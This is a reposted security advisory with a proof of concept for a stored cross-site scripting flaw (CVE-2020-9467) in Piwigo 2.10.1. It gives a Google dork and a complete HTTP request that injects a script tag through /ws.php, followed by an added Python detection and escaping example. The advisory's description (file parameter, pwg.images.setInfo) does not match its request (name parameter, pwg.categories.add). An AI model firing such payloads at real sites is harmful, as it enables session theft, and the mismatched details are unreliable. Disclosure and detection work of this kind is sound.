Piwigo 2.10.1 - Cross-Site Scripting - Hack之路

Piwigo 2.10.1 - Cross-Site Scripting

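# PoC by: 铱

# Software homepage: http://www.piwigo.org

# Version: 2.10.1

# Tested on: Linux and Windows

# Category: webapps

# Google Dork: intext:"Powered by Piwigo"

# CVE: CVE-2020-9467

######## Description ########

Piwigo 2.10.1 has stored XSS via the file parameter in a /ws.php request because of the pwg.images.setInfo function.

######## Proof of Concept ########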
*Request*
POST /piwigo/ws.php?format=json HTTP/1.1
Host: [victim]
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:80.0) Gecko/20100101 Firefox/80.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 79
Origin: http://[victim]
Connection: close
Referer: http://[victim]/piwigo/admin.php?page=photos_add&section=direct
Cookie: pwg_id=08tksticrdkctrvj3gufqqbsnh

method=pwg.categories.add&parent=1&name=%3Cscript%3Ealert('XSS')%3C%2Fscript%3E
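
A defensive check for the request shown above, as an added example that is not part of the original advisory or of Piwigo's code: it decodes a form-encoded /ws.php body, flags parameter values that carry HTML or script markup, and shows the same value encoded for an HTML text context. The function names, the regular expression and the second sample body are assumptions made for the illustration.

```python
import html
import re
from urllib.parse import parse_qsl

# Sample bodies: the first is the body of the request above,
# the second is a constructed benign request for comparison.
SAMPLE_BODIES = [
    "method=pwg.categories.add&parent=1&name=%3Cscript%3Ealert('XSS')%3C%2Fscript%3E",
    "method=pwg.categories.add&parent=1&name=Holiday+2020",
]

# Heuristic (assumption): a tag opener, an inline event handler,
# or a javascript: URL inside a decoded parameter value.
MARKUP = re.compile(r"<\s*/?\s*[a-z!]|\bon\w+\s*=|javascript\s*:", re.IGNORECASE)


def inspect_ws_body(body):
    """Return (method, [(param, decoded_value), ...]) for values carrying markup."""
    fields = parse_qsl(body, keep_blank_values=True)  # also percent-decodes
    method = next((v for k, v in fields if k == "method"), None)
    hits = [(k, v) for k, v in fields if k != "method" and MARKUP.search(v)]
    return method, hits


def render_safe(value):
    """Encode a stored value before it is written into an HTML page."""
    return html.escape(value, quote=True)


if __name__ == "__main__":
    for body in SAMPLE_BODIES:
        method, hits = inspect_ws_body(body)
        for param, value in hits:
            print(f"ALERT method={method} param={param} value={value!r} "
                  f"encoded={render_safe(value)!r}")
```

The pattern match is a detection aid for logs or a request filter; the output encoding in `render_safe` is what keeps a stored value from executing when it is displayed.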

Website: https://www.hackzl.cn; publisher: hack之路. When reposting, please credit the source: https://www.hackzl.cn/index.php/2020/09/21/piwigo-2-10-1-%e8%b7%a8%e7%ab%99%e7%82%b9%e8%84%9a%e6%9c%ac-hack%e4%b9%8b%e8%b7%af/
